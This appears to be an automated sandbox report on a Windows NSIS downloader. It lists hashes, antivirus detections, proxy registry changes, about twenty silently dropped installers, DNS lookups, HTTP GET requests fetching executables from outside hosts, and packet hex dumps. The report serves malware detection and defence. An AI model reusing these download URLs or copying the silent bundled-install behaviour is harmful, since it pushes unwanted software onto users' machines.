Analysis Date2015-01-21 05:35:57
MD51f90bace658860068958dd00c92fd1d5
SHA1aef92b2193fe1597f07c548518dc409423b22d5b

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 0bc2ffd32265a08d72b795b18265828d sha1: dd2a446014a37556f39173b802c63a4e46e09366 size: 23552
Section.rdata md5: f179218a059068529bdb4637ef5fa28e sha1: 6035d27db526131eb0f29aee60cfcdbb5072ed7d size: 4608
Section.data md5: 975304d6dd6c4a4f076b15511e2bbbc0 sha1: 1f65340672c91ffd0f2583ff104beaece43c7855 size: 1024
Section.ndata md5: d41d8cd98f00b204e9800998ecf8427e sha1: da39a3ee5e6b4b0d3255bfef95601890afd80709 size: 0
Section.rsrc md5: 9adb44fc548ce7d7b4900c5c87a7d0d9 sha1: 21d91218e8cedec38a59e5e9797b05fafc29d972 size: 276480
Timestamp2009-12-05 22:50:46
PackerNullsoft PiMP Stub -> SFX
PEhash41a9077f9cd93347084a0141620fc293e6c8c33d
IMPhash099c0646ea7282d232219f8807883be0
AV360 Safeno_virus
AVAd-Awareno_virus
AVAlwil (avast)no_virus
AVArcabit (arcavir)no_virus
AVAuthentiumno_virus
AVAvira (antivir)no_virus
AVBullGuardno_virus
AVCA (E-Trust Ino)no_virus
AVCAT (quickheal)Downloader.NSIS.r5 (Not a Virus)
AVClamAVno_virus
AVDr. Webno_virus
AVEmsisoftno_virus
AVEset (nod32)NSIS/TrojanDownloader.Chindo.I
AVFortinetno_virus
AVFrisk (f-prot)no_virus
AVF-Secureno_virus
AVGrisoft (avg)no_virus
AVIkarusno_virus
AVK7no_virus
AVKasperskyHEUR:Downloader.NSIS.Feasu.heur
AVMalwareBytesno_virus
AVMcafeeno_virus
AVMicrosoft Security Essentialsno_virus
AVMicroWorld (escan)no_virus
AVRisingno_virus
AVSophosno_virus
AVSymantecTrojan.Gen.2
AVTrend Microno_virus
AVVirusBlokAda (vba32)no_virus

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nss3.tmp\Inetc.dll
Creates Filesetup_001.exe
Creates FileBaiduPlayerNetSetup_472.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nss3.tmp\1.rar
Creates Fileins1256858.exe
Creates FileOfficeAssist.0334.80.1078.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nss3.tmp\Base64.dll
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nss3.tmp\nsProcess.dll
Creates FilePIPE\wkssvc
Creates FileF1023_s_30974.exe
Creates File9377mycs_Y_mgaz2_01.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsn2.tmp
Creates Filesetup_3386.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nss3.tmp\k2.ico
Creates FileUCBrowser_V3.1.1644.29_4443_(Build14102814)_downloader.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Fileyx_dts.exe
Creates FileC:\Program Files\2118\Uninstall.exe
Creates Fileletvsetup.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nss3.tmp\System.dll
Creates FileIQIYIsetup_l_spl004@kb010.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FileC:\Documents and Settings\Administrator\Start Menu\Programs\2118\uninst.lnk
Creates FileG1031_s_71115.exe
Creates File2345Explorer_329242_silence.exe
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileWanDouJia_runk4_kb.exe
Creates FilePIPE\srvsvc
Creates FileMM-liao8398.exe
Creates FileSoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temp\nss3.tmp\k1.ico
Creates FileQQBrowser_Setup_Hk_78653.exe
Deletes Fileletvsetup.exe
Deletes Filesetup_001.exe
Deletes FileBaiduPlayerNetSetup_472.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nss3.tmp\1.rar
Deletes FileIQIYIsetup_l_spl004@kb010.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nsm1.tmp
Deletes Fileins1256858.exe
Deletes FileOfficeAssist.0334.80.1078.exe
Deletes File2345Explorer_329242_silence.exe
Deletes FileG1031_s_71115.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nss3.tmp
Deletes FileF1023_s_30974.exe
Deletes File9377mycs_Y_mgaz2_01.exe
Deletes Filesetup_3386.exe
Deletes FileC:\Documents and Settings\Administrator\Local Settings\Temp\nss3.tmp\k2.ico
Deletes FileWanDouJia_runk4_kb.exe
Deletes FileMM-liao8398.exe
Deletes FileSoHuVA_4.3.0.1-c204900003-ng-nti-s-x.exe
Deletes FileUCBrowser_V3.1.1644.29_4443_(Build14102814)_downloader.exe
Deletes Fileyx_dts.exe
Deletes FileQQBrowser_Setup_Hk_78653.exe
Creates ProcessWanDouJia_runk4_kb.exe -hide
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex2118
Winsock DNSint.dpool.sina.com.cn
Winsock DNSshow.man1234.com
Winsock DNSxn--sesz3ik91bknc.xn--fiqs8s
Winsock DNSleju.down.letv.com
Winsock DNSd.qq66699.com

Process
↳ C:\Program Files\Internet Explorer\iexplore.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window_Placement ➝
NULL
RegistryHKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Toolbar\Locked ➝
1
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex_SHuassist.mtx
Creates MutexShell.CMruPidlList

Process
↳ WanDouJia_runk4_kb.exe -hide

Network Details:

DNSint.dpool.sina.com.cn
Type: A
180.149.136.250
DNSshow.man1234.com
Type: A
122.227.42.227
DNSc01.i06.arnic.hadns.net
Type: A
222.186.20.122
DNSc01.i06.arnic.hadns.net
Type: A
58.220.2.5
DNSc01.i06.arnic.hadns.net
Type: A
113.17.184.10
DNSc01.i06.arnic.hadns.net
Type: A
121.10.117.139
DNSc01.i06.arnic.hadns.net
Type: A
183.56.172.47
DNScoop.gslb.leletv.net
Type: A
115.182.51.55
DNSshadu.n.shifen.com
Type: A
123.125.65.162
DNSswwx.n.shifen.com
Type: A
123.125.65.175
DNSdldir1.qq.com.cdngc.net
Type: A
174.35.56.180
DNSdldir1.qq.com.cdngc.net
Type: A
174.35.56.83
DNSdl.p2sp.n.shifen.com
Type: A
61.135.185.123
DNSg.quwen320.com
Type: A
219.238.237.210
DNSdownload012.rdb.cnc.ccgslb.com.cn
Type: A
218.60.107.12
DNSdownload012.rdb.cnc.ccgslb.com.cn
Type: A
61.179.105.147
DNSdown.gtm.ucweb.com
Type: A
120.196.208.98
DNSdown.gtm.ucweb.com
Type: A
211.103.82.247
DNSopt.xdwscache.glb0.lxdns.com
Type: A
8.37.235.3
DNSopt.xdwscache.glb0.lxdns.com
Type: A
8.37.235.5
DNSopt.xdwscache.glb0.lxdns.com
Type: A
8.37.235.6
DNSopt.xdwscache.glb0.lxdns.com
Type: A
8.37.234.3
DNSopt.xdwscache.glb0.lxdns.com
Type: A
8.37.234.4
DNSopt.xdwscache.glb0.lxdns.com
Type: A
8.37.235.2
DNSna.b9.aicdn.com
Type: A
108.186.7.131
DNSna.b9.aicdn.com
Type: A
72.8.188.90
DNSna.b9.aicdn.com
Type: A
72.8.188.94
DNSna.b9.aicdn.com
Type: A
72.8.188.98
DNSna.b9.aicdn.com
Type: A
108.186.7.129
DNSna.b9.aicdn.com
Type: A
108.186.7.130
DNSdownload.pps.tv.webscache.com
Type: A
119.188.40.81
DNSdownload.2345.com
Type: A
122.228.248.3
DNSdownload.2345.com
Type: A
218.75.155.244
DNSdownload.2345.com
Type: A
60.191.187.15
DNSdownload.2345.com
Type: A
60.191.223.2
DNSdownload.2345.com
Type: A
60.191.223.4
DNSdownload.2345.com
Type: A
60.191.223.15
DNSdownload.2345.com
Type: A
61.147.127.202
DNSdownload.2345.com
Type: A
61.147.127.203
DNSdownload.2345.com
Type: A
61.160.245.8
DNSdownload.2345.com
Type: A
61.160.245.11
DNSdownload.2345.com
Type: A
61.160.245.14
DNSaaa.163vv.com
Type: A
60.222.232.224
DNSaaa.163vv.com
Type: A
222.186.60.18
DNSaaa.163vv.com
Type: A
222.186.60.23
DNSaaa.163vv.com
Type: A
222.186.60.60
DNSs.lllsoo.com
Type: A
42.120.61.139
DNSdl.wandoujia.com
Type: A
125.39.216.11
DNSxn--sesz3ik91bknc.xn--fiqs8s
Type: A
DNSd.qq66699.com
Type: A
DNSleju.down.letv.com
Type: A
DNSshadu.baidu.com
Type: A
DNSw.x.baidu.com
Type: A
DNSdldir1.qq.com
Type: A
DNSdl.p2sp.baidu.com
Type: A
DNSwdl1.cache.wps.cn
Type: A
DNSdown2.uc.cn
Type: A
DNSxiazai.9377.com
Type: A
DNSsoft.lvbaoranshiye.com
Type: A
DNSdl.static.iqiyi.com
Type: A
DNSdownload.2345.cn
Type: A
DNSdown.yinyue.fm
Type: A
HTTP GEThttp://int.dpool.sina.com.cn/iplookup/iplookup.php
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://show.man1234.com/mmliao/MM-liao8398.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://d.qq66699.com/yx/dts/sqcs/916631/yx_dts.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://leju.down.letv.com/pcweb/version/7.1.2.327/client_lianmeng7-09/letvsetup.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://shadu.baidu.com/index/fulldownload/30974
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://w.x.baidu.com/go/full/1/71115
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://dldir1.qq.com/invc/tt/QQBrowser_Setup_Hk_78653.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://dl.p2sp.baidu.com/BaiduPlayerContent/BaiduPlayerNetSetup_472.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://g.quwen320.com/d/ins1256858.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://wdl1.cache.wps.cn/wps/download/OfficeAssist.0334.80.1078.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://down2.uc.cn/pcbrowser/down.php?id=101&pid=4443&type=downloader
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://xiazai.9377.com/20140928/9377mycs_Y_mgaz2_01.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://soft.lvbaoranshiye.com/SoHuVA_4.3.0.1-c204900003-ng-nti-s-x.rar
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://dl.static.iqiyi.com/hz/IQIYIsetup_l_spl004@kb010.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://download.2345.cn/silence/2345Explorer_329242_silence.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://down.yinyue.fm/open/setup_3386.exe
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://s.lllsoo.com/click/66947
User-Agent: NSIS_Inetc (Mozilla)
HTTP GEThttp://dl.wandoujia.com/files/inst/WanDouJia_runk4_kb.exe
User-Agent: NSIS_Inetc (Mozilla)
Flows TCP192.168.1.1:1031 ➝ 180.149.136.250:80
Flows TCP192.168.1.1:1032 ➝ 122.227.42.227:80
Flows TCP192.168.1.1:1033 ➝ 222.186.20.122:80
Flows TCP192.168.1.1:1034 ➝ 115.182.51.55:80
Flows TCP192.168.1.1:1035 ➝ 123.125.65.162:80
Flows TCP192.168.1.1:1036 ➝ 123.125.65.175:80
Flows TCP192.168.1.1:1037 ➝ 174.35.56.180:80
Flows TCP192.168.1.1:1038 ➝ 61.135.185.123:80
Flows TCP192.168.1.1:1039 ➝ 219.238.237.210:80
Flows TCP192.168.1.1:1040 ➝ 218.60.107.12:80
Flows TCP192.168.1.1:1041 ➝ 120.196.208.98:80
Flows TCP192.168.1.1:1042 ➝ 8.37.235.3:80
Flows TCP192.168.1.1:1043 ➝ 108.186.7.131:80
Flows TCP192.168.1.1:1044 ➝ 119.188.40.81:80
Flows TCP192.168.1.1:1045 ➝ 122.228.248.3:80
Flows TCP192.168.1.1:1046 ➝ 60.222.232.224:80
Flows TCP192.168.1.1:1047 ➝ 42.120.61.139:80
Flows TCP192.168.1.1:1048 ➝ 125.39.216.11:80

Raw Pcap
0x00000000 (00000)   47455420 2f69706c 6f6f6b75 702f6970   GET /iplookup/ip
0x00000010 (00016)   6c6f6f6b 75702e70 68702048 5454502f   lookup.php HTTP/
0x00000020 (00032)   312e310d 0a557365 722d4167 656e743a   1.1..User-Agent:
0x00000030 (00048)   204e5349 535f496e 65746320 284d6f7a    NSIS_Inetc (Moz
0x00000040 (00064)   696c6c61 290d0a48 6f73743a 20696e74   illa)..Host: int
0x00000050 (00080)   2e64706f 6f6c2e73 696e612e 636f6d2e   .dpool.sina.com.
0x00000060 (00096)   636e0d0a 436f6e6e 65637469 6f6e3a20   cn..Connection: 
0x00000070 (00112)   4b656570 2d416c69 76650d0a 43616368   Keep-Alive..Cach
0x00000080 (00128)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x00000090 (00144)   6368650d 0a0d0a                       che....

0x00000000 (00000)   47455420 2f6d6d6c 69616f2f 4d4d2d6c   GET /mmliao/MM-l
0x00000010 (00016)   69616f38 3339382e 65786520 48545450   iao8398.exe HTTP
0x00000020 (00032)   2f312e31 0d0a5573 65722d41 67656e74   /1.1..User-Agent
0x00000030 (00048)   3a204e53 49535f49 6e657463 20284d6f   : NSIS_Inetc (Mo
0x00000040 (00064)   7a696c6c 61290d0a 486f7374 3a207368   zilla)..Host: sh
0x00000050 (00080)   6f772e6d 616e3132 33342e63 6f6d0d0a   ow.man1234.com..
0x00000060 (00096)   436f6e6e 65637469 6f6e3a20 4b656570   Connection: Keep
0x00000070 (00112)   2d416c69 76650d0a 43616368 652d436f   -Alive..Cache-Co
0x00000080 (00128)   6e74726f 6c3a206e 6f2d6361 6368650d   ntrol: no-cache.
0x00000090 (00144)   0a0d0a0d 0a0d0a                       .......

0x00000000 (00000)   47455420 2f79782f 6474732f 73716373   GET /yx/dts/sqcs
0x00000010 (00016)   2f393136 3633312f 79785f64 74732e65   /916631/yx_dts.e
0x00000020 (00032)   78652048 5454502f 312e310d 0a557365   xe HTTP/1.1..Use
0x00000030 (00048)   722d4167 656e743a 204e5349 535f496e   r-Agent: NSIS_In
0x00000040 (00064)   65746320 284d6f7a 696c6c61 290d0a48   etc (Mozilla)..H
0x00000050 (00080)   6f73743a 20642e71 71363636 39392e63   ost: d.qq66699.c
0x00000060 (00096)   6f6d0d0a 436f6e6e 65637469 6f6e3a20   om..Connection: 
0x00000070 (00112)   4b656570 2d416c69 76650d0a 43616368   Keep-Alive..Cach
0x00000080 (00128)   652d436f 6e74726f 6c3a206e 6f2d6361   e-Control: no-ca
0x00000090 (00144)   6368650d 0a0d0a                       che....

0x00000000 (00000)   47455420 2f706377 65622f76 65727369   GET /pcweb/versi
0x00000010 (00016)   6f6e2f37 2e312e32 2e333237 2f636c69   on/7.1.2.327/cli
0x00000020 (00032)   656e745f 6c69616e 6d656e67 372d3039   ent_lianmeng7-09
0x00000030 (00048)   2f6c6574 76736574 75702e65 78652048   /letvsetup.exe H
0x00000040 (00064)   5454502f 312e310d 0a557365 722d4167   TTP/1.1..User-Ag
0x00000050 (00080)   656e743a 204e5349 535f496e 65746320   ent: NSIS_Inetc 
0x00000060 (00096)   284d6f7a 696c6c61 290d0a48 6f73743a   (Mozilla)..Host:
0x00000070 (00112)   206c656a 752e646f 776e2e6c 6574762e    leju.down.letv.
0x00000080 (00128)   636f6d0d 0a436f6e 6e656374 696f6e3a   com..Connection:
0x00000090 (00144)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x000000a0 (00160)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000b0 (00176)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   47455420 2f696e64 65782f66 756c6c64   GET /index/fulld
0x00000010 (00016)   6f776e6c 6f61642f 33303937 34204854   ownload/30974 HT
0x00000020 (00032)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000030 (00048)   6e743a20 4e534953 5f496e65 74632028   nt: NSIS_Inetc (
0x00000040 (00064)   4d6f7a69 6c6c6129 0d0a486f 73743a20   Mozilla)..Host: 
0x00000050 (00080)   73686164 752e6261 6964752e 636f6d0d   shadu.baidu.com.
0x00000060 (00096)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000070 (00112)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x00000080 (00128)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000090 (00144)   0d0a0d0a 702d416c 6976650d 0a436163   ....p-Alive..Cac
0x000000a0 (00160)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000b0 (00176)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   47455420 2f676f2f 66756c6c 2f312f37   GET /go/full/1/7
0x00000010 (00016)   31313135 20485454 502f312e 310d0a55   1115 HTTP/1.1..U
0x00000020 (00032)   7365722d 4167656e 743a204e 5349535f   ser-Agent: NSIS_
0x00000030 (00048)   496e6574 6320284d 6f7a696c 6c61290d   Inetc (Mozilla).
0x00000040 (00064)   0a486f73 743a2077 2e782e62 61696475   .Host: w.x.baidu
0x00000050 (00080)   2e636f6d 0d0a436f 6e6e6563 74696f6e   .com..Connection
0x00000060 (00096)   3a204b65 65702d41 6c697665 0d0a4361   : Keep-Alive..Ca
0x00000070 (00112)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000080 (00128)   63616368 650d0a0d 0a6f2d63 61636865   cache....o-cache
0x00000090 (00144)   0d0a0d0a 702d416c 6976650d 0a436163   ....p-Alive..Cac
0x000000a0 (00160)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000b0 (00176)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   47455420 2f696e76 632f7474 2f515142   GET /invc/tt/QQB
0x00000010 (00016)   726f7773 65725f53 65747570 5f486b5f   rowser_Setup_Hk_
0x00000020 (00032)   37383635 332e6578 65204854 54502f31   78653.exe HTTP/1
0x00000030 (00048)   2e310d0a 55736572 2d416765 6e743a20   .1..User-Agent: 
0x00000040 (00064)   4e534953 5f496e65 74632028 4d6f7a69   NSIS_Inetc (Mozi
0x00000050 (00080)   6c6c6129 0d0a486f 73743a20 646c6469   lla)..Host: dldi
0x00000060 (00096)   72312e71 712e636f 6d0d0a43 6f6e6e65   r1.qq.com..Conne
0x00000070 (00112)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x00000080 (00128)   650d0a43 61636865 2d436f6e 74726f6c   e..Cache-Control
0x00000090 (00144)   3a206e6f 2d636163 68650d0a 0d0a6163   : no-cache....ac
0x000000a0 (00160)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000b0 (00176)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   47455420 2f426169 6475506c 61796572   GET /BaiduPlayer
0x00000010 (00016)   436f6e74 656e742f 42616964 75506c61   Content/BaiduPla
0x00000020 (00032)   7965724e 65745365 7475705f 3437322e   yerNetSetup_472.
0x00000030 (00048)   65786520 48545450 2f312e31 0d0a5573   exe HTTP/1.1..Us
0x00000040 (00064)   65722d41 67656e74 3a204e53 49535f49   er-Agent: NSIS_I
0x00000050 (00080)   6e657463 20284d6f 7a696c6c 61290d0a   netc (Mozilla)..
0x00000060 (00096)   486f7374 3a20646c 2e703273 702e6261   Host: dl.p2sp.ba
0x00000070 (00112)   6964752e 636f6d0d 0a436f6e 6e656374   idu.com..Connect
0x00000080 (00128)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x00000090 (00144)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000a0 (00160)   6e6f2d63 61636865 0d0a0d0a 6e6f2d63   no-cache....no-c
0x000000b0 (00176)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   47455420 2f642f69 6e733132 35363835   GET /d/ins125685
0x00000010 (00016)   382e6578 65204854 54502f31 2e310d0a   8.exe HTTP/1.1..
0x00000020 (00032)   55736572 2d416765 6e743a20 4e534953   User-Agent: NSIS
0x00000030 (00048)   5f496e65 74632028 4d6f7a69 6c6c6129   _Inetc (Mozilla)
0x00000040 (00064)   0d0a486f 73743a20 672e7175 77656e33   ..Host: g.quwen3
0x00000050 (00080)   32302e63 6f6d0d0a 436f6e6e 65637469   20.com..Connecti
0x00000060 (00096)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000070 (00112)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x00000080 (00128)   6f2d6361 6368650d 0a0d0a6c 6976650d   o-cache....live.
0x00000090 (00144)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x000000a0 (00160)   6e6f2d63 61636865 0d0a0d0a 6e6f2d63   no-cache....no-c
0x000000b0 (00176)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   47455420 2f777073 2f646f77 6e6c6f61   GET /wps/downloa
0x00000010 (00016)   642f4f66 66696365 41737369 73742e30   d/OfficeAssist.0
0x00000020 (00032)   3333342e 38302e31 3037382e 65786520   334.80.1078.exe 
0x00000030 (00048)   48545450 2f312e31 0d0a5573 65722d41   HTTP/1.1..User-A
0x00000040 (00064)   67656e74 3a204e53 49535f49 6e657463   gent: NSIS_Inetc
0x00000050 (00080)   20284d6f 7a696c6c 61290d0a 486f7374    (Mozilla)..Host
0x00000060 (00096)   3a207764 6c312e63 61636865 2e777073   : wdl1.cache.wps
0x00000070 (00112)   2e636e0d 0a436f6e 6e656374 696f6e3a   .cn..Connection:
0x00000080 (00128)   204b6565 702d416c 6976650d 0a436163    Keep-Alive..Cac
0x00000090 (00144)   68652d43 6f6e7472 6f6c3a20 6e6f2d63   he-Control: no-c
0x000000a0 (00160)   61636865 0d0a0d0a 0d0a0d0a 6e6f2d63   ache........no-c
0x000000b0 (00176)   61636865 0d0a0d0a                     ache....

0x00000000 (00000)   47455420 2f706362 726f7773 65722f64   GET /pcbrowser/d
0x00000010 (00016)   6f776e2e 7068703f 69643d31 30312670   own.php?id=101&p
0x00000020 (00032)   69643d34 34343326 74797065 3d646f77   id=4443&type=dow
0x00000030 (00048)   6e6c6f61 64657220 48545450 2f312e31   nloader HTTP/1.1
0x00000040 (00064)   0d0a5573 65722d41 67656e74 3a204e53   ..User-Agent: NS
0x00000050 (00080)   49535f49 6e657463 20284d6f 7a696c6c   IS_Inetc (Mozill
0x00000060 (00096)   61290d0a 486f7374 3a20646f 776e322e   a)..Host: down2.
0x00000070 (00112)   75632e63 6e0d0a43 6f6e6e65 6374696f   uc.cn..Connectio
0x00000080 (00128)   6e3a204b 6565702d 416c6976 650d0a43   n: Keep-Alive..C
0x00000090 (00144)   61636865 2d436f6e 74726f6c 3a206e6f   ache-Control: no
0x000000a0 (00160)   2d636163 68650d0a 0d0a                -cache....

0x00000000 (00000)   47455420 2f323031 34303932 382f3933   GET /20140928/93
0x00000010 (00016)   37376d79 63735f59 5f6d6761 7a325f30   77mycs_Y_mgaz2_0
0x00000020 (00032)   312e6578 65204854 54502f31 2e310d0a   1.exe HTTP/1.1..
0x00000030 (00048)   55736572 2d416765 6e743a20 4e534953   User-Agent: NSIS
0x00000040 (00064)   5f496e65 74632028 4d6f7a69 6c6c6129   _Inetc (Mozilla)
0x00000050 (00080)   0d0a486f 73743a20 7869617a 61692e39   ..Host: xiazai.9
0x00000060 (00096)   3337372e 636f6d0d 0a436f6e 6e656374   377.com..Connect
0x00000070 (00112)   696f6e3a 204b6565 702d416c 6976650d   ion: Keep-Alive.
0x00000080 (00128)   0a436163 68652d43 6f6e7472 6f6c3a20   .Cache-Control: 
0x00000090 (00144)   6e6f2d63 61636865 0d0a0d0a 3a206e6f   no-cache....: no
0x000000a0 (00160)   2d636163 68650d0a 0d0a                -cache....

0x00000000 (00000)   47455420 2f536f48 7556415f 342e332e   GET /SoHuVA_4.3.
0x00000010 (00016)   302e312d 63323034 39303030 30332d6e   0.1-c204900003-n
0x00000020 (00032)   672d6e74 692d732d 782e7261 72204854   g-nti-s-x.rar HT
0x00000030 (00048)   54502f31 2e310d0a 55736572 2d416765   TP/1.1..User-Age
0x00000040 (00064)   6e743a20 4e534953 5f496e65 74632028   nt: NSIS_Inetc (
0x00000050 (00080)   4d6f7a69 6c6c6129 0d0a486f 73743a20   Mozilla)..Host: 
0x00000060 (00096)   736f6674 2e6c7662 616f7261 6e736869   soft.lvbaoranshi
0x00000070 (00112)   79652e63 6f6d0d0a 436f6e6e 65637469   ye.com..Connecti
0x00000080 (00128)   6f6e3a20 4b656570 2d416c69 76650d0a   on: Keep-Alive..
0x00000090 (00144)   43616368 652d436f 6e74726f 6c3a206e   Cache-Control: n
0x000000a0 (00160)   6f2d6361 6368650d 0a0d0a              o-cache....

0x00000000 (00000)   47455420 2f687a2f 49514959 49736574   GET /hz/IQIYIset
0x00000010 (00016)   75705f6c 5f73706c 30303440 6b623031   up_l_spl004@kb01
0x00000020 (00032)   302e6578 65204854 54502f31 2e310d0a   0.exe HTTP/1.1..
0x00000030 (00048)   55736572 2d416765 6e743a20 4e534953   User-Agent: NSIS
0x00000040 (00064)   5f496e65 74632028 4d6f7a69 6c6c6129   _Inetc (Mozilla)
0x00000050 (00080)   0d0a486f 73743a20 646c2e73 74617469   ..Host: dl.stati
0x00000060 (00096)   632e6971 6979692e 636f6d0d 0a436f6e   c.iqiyi.com..Con
0x00000070 (00112)   6e656374 696f6e3a 204b6565 702d416c   nection: Keep-Al
0x00000080 (00128)   6976650d 0a436163 68652d43 6f6e7472   ive..Cache-Contr
0x00000090 (00144)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x000000a0 (00160)   6f2d6361 6368650d 0a0d0a              o-cache....

0x00000000 (00000)   47455420 2f73696c 656e6365 2f323334   GET /silence/234
0x00000010 (00016)   35457870 6c6f7265 725f3332 39323432   5Explorer_329242
0x00000020 (00032)   5f73696c 656e6365 2e657865 20485454   _silence.exe HTT
0x00000030 (00048)   502f312e 310d0a55 7365722d 4167656e   P/1.1..User-Agen
0x00000040 (00064)   743a204e 5349535f 496e6574 6320284d   t: NSIS_Inetc (M
0x00000050 (00080)   6f7a696c 6c61290d 0a486f73 743a2064   ozilla)..Host: d
0x00000060 (00096)   6f776e6c 6f61642e 32333435 2e636e0d   ownload.2345.cn.
0x00000070 (00112)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000080 (00128)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x00000090 (00144)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000a0 (00160)   0d0a0d0a 6368650d 0a0d0a              ....che....

0x00000000 (00000)   47455420 2f6f7065 6e2f7365 7475705f   GET /open/setup_
0x00000010 (00016)   33333836 2e657865 20485454 502f312e   3386.exe HTTP/1.
0x00000020 (00032)   310d0a55 7365722d 4167656e 743a204e   1..User-Agent: N
0x00000030 (00048)   5349535f 496e6574 6320284d 6f7a696c   SIS_Inetc (Mozil
0x00000040 (00064)   6c61290d 0a486f73 743a2064 6f776e2e   la)..Host: down.
0x00000050 (00080)   79696e79 75652e66 6d0d0a43 6f6e6e65   yinyue.fm..Conne
0x00000060 (00096)   6374696f 6e3a204b 6565702d 416c6976   ction: Keep-Aliv
0x00000070 (00112)   650d0a43 61636865 2d436f6e 74726f6c   e..Cache-Control
0x00000080 (00128)   3a206e6f 2d636163 68650d0a 0d0a2d43   : no-cache....-C
0x00000090 (00144)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x000000a0 (00160)   0d0a0d0a 6368650d 0a0d0a              ....che....

0x00000000 (00000)   47455420 2f636c69 636b2f36 36393437   GET /click/66947
0x00000010 (00016)   20485454 502f312e 310d0a55 7365722d    HTTP/1.1..User-
0x00000020 (00032)   4167656e 743a204e 5349535f 496e6574   Agent: NSIS_Inet
0x00000030 (00048)   6320284d 6f7a696c 6c61290d 0a486f73   c (Mozilla)..Hos
0x00000040 (00064)   743a2073 2e6c6c6c 736f6f2e 636f6d0d   t: s.lllsoo.com.
0x00000050 (00080)   0a436f6e 6e656374 696f6e3a 204b6565   .Connection: Kee
0x00000060 (00096)   702d416c 6976650d 0a436163 68652d43   p-Alive..Cache-C
0x00000070 (00112)   6f6e7472 6f6c3a20 6e6f2d63 61636865   ontrol: no-cache
0x00000080 (00128)   0d0a0d0a 2d636163 68650d0a 0d0a2d43   ....-cache....-C
